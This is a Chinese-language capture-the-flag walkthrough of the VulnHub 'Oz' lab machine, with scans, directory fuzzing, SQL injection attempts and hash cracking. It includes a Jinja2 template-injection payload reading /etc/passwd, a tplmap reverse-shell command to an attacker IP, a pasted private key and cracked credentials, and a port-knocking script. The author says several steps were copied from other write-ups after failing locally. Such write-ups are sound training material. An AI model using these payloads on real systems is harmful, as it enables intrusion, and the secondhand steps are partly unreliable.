本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切后果與發表本文章的作者無關
靶機環境:https://www.vulnhub.com/entry/oz-1,317/
1. 信息收集
nmap -sV -sC -T5 -p- 192.168.5.128
掃描結果:
kali@kali:~$ nmap -sV -sC -T5 -p- 192.168.5.128
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-06 21:49 EDT
Nmap scan report for 192.168.5.128
Host is up (0.00087s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
|_http-title: OZ webapi
|_http-trane-info: Problem with XML parsing of /evox/about
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Werkzeug/0.14.1 Python/2.7.14
| http-title: GBR Support - Login
|_Requested resource was http://192.168.5.128:8080/login
|_http-trane-info: Problem with XML parsing of /evox/about
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.76 seconds
發現開放了兩個端口分別為:80,8080
根據nmap掃描的信息可以知道,開放的端口是Python2.7版本寫的Werkzeug,用這個關鍵字在github搜了下,發現有個利用的exp,可以命令執行
https://github.com/Fare9/PyWerkzeug-Debug-Command-Execution/
這個有對於的metasploit的payload
上述測試發現不行,目標調試模式沒有開啟
嘗試使用dirsearch暴力猜解目錄,這個下載下來直接使用python3執行即可,下面是github地址
https://github.com/maurosoria/dirsearch
對目標開始爆破的命令
python3 dirsearch.py -u http://192.168.5.128 -e *
掃描的全是返回的200響應碼,訪問幾個測試一下,實際是不存在的,但是目標會干擾你的思路,因為訪問的時候會顯示一個隨機的字符串
那么看看目標網站還有什么被允許的請求
使用curl命令進行測試
kali@kali:~$ curl -i -X OPTIONS http://192.168.5.128
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Allow: HEAD, OPTIONS, GET
Content-Length: 0
Server: Werkzeug/0.14.1 Python/2.7.14
Date: Fri, 07 Aug 2020 10:17:04 GMT
發現了一個特點,那就是返回的200響應碼顯示的結果中的Content-Length為0,那么我們可以使用這個特點來測試,這里就直接使用wfuzz命令來進行模糊測試
wfuzz -u http://192.168.5.128/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hl 0
wfuzz的使用方式:https://blog.csdn.net/hardhard123/article/details/79596104
sqlmap -u "http://192.168.5.128/users" --dbs --batch 這里我使用的靶機並沒有測試成功能夠注入,下面兩步操作是根據網上的記錄拿下來的,大家有疑問可以自己去嘗試,目的重點是學習這其中的方法和思路,靶機是為了訓練實戰,加深印象
注入成之后能獲取對應的賬號和加密的密碼
通過使用john進行破解密碼
john --format=pbkdf2-hmac-sha256 --wordlist=/usr/share/wordlist/rockyou.txt ozhases.txt
破解出來獲取的如下密碼
wizard.oz:wizardofoz22
上述也可使用hashcat進行破解
因為這里無法通過sql注入,所以無法獲得目標用戶的私鑰,這里就直接從網上的拿過來
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6
RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFCnb6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3Fne1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBtynh9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbzna//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybdn9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6nZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcjnevroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2MnEycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yavn5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQrnDHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJptonbYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+nwtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1Vn0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IHnznNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mftnicOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMCnzCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnunvI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKwnw/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3nc6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0nnOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5nuoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzbn/4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYvnQGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJunXtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3
-----END RSA PRIVATE KEY-----
有了私鑰,但是目標只開放了80和8080端口,那先放着
開始訪問8080端口
使用burpsuite進行抓包查看
POST / HTTP/1.1
Host: 192.168.5.128:8080
Content-Length: 30
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.5.128:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.5.128:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5Njc5OTA4Mn0.hRecZ0MV_2HusS947TIhqpUrn6ZS99CD4FQhrY2i8_s
Connection: close
name={{8*'8'}}&desc=dsfsdfasdf
HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 31
Location: http://192.168.5.128:8080/
Server: Werkzeug/0.14.1 Python/2.7.14
Date: Fri, 07 Aug 2020 11:11:35 GMT
Name: 88888888 desc: dsfsdfasdf
POST / HTTP/1.1
Host: 192.168.5.128:8080
Content-Length: 82
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.5.128:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.5.128:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5Njc5OTA4Mn0.hRecZ0MV_2HusS947TIhqpUrn6ZS99CD4FQhrY2i8_s
Connection: close
name={{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}&desc=2
使用tplmap進行 ssti注入
https://github.com/epinna/tplmap
python tplmap.py -u 'http://192.168.5.128:8080' -X POST -d 'name=*&desc=anything' -c 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IndpemFyZC5veiIsImV4cCI6MTU5NjgwMjkxMH0.GU5jNRig6m1UPOl97Avigh01FAV74vN9lTzeUpFsexY' --reverse-shell 192.168.5.129 4488
我這里測試的靶機同樣並沒有成功
/.secret # cat knockd.conf
[options]
logfile = /var/log/knockd.log
[opencloseSSH]
sequence = 40809:udp,50212:udp,46969:udp
seq_timeout = 15
start_command = ufw allow from %IP% to any port 22
cmd_timeout = 10
stop_command = ufw delete allow from %IP% to any port 22
tcpflags = syn
大概意思就是在15秒內,安裝順序聯系udp端口40809,50212,46969,之后的10秒鍾之內是可以連接目標的22端口
上述操作完成之后發現有knock,那么可以通過如下腳本進行操作
#!/bin/bash
ports="40809 50212 46969"
for port in $ports; do
echo "[*] Knocking on ${port}"
echo "a" | nc -u -w 1 192.168.5.128 ${port}
sleep 0.1
done;
echo "[*] Knocking done."
echo "[*] Password:"
echo "N0Pl4c3L1keH0me"
ssh -i /home/kali/Downloads/id_rsa dorthi@192.168.5.128
也有另一種方法
https://github.com/grongor/knock
./knock 192.168.5.128 -u 40809 50212 46969 && ssh -i id_rsa dorthi@192.168.5.128
參考:
https://www.anquanke.com/post/id/170362
https://www.twblogs.net/a/5c433dcabd9eee35b3a6f4d2/?lang=zh-cn
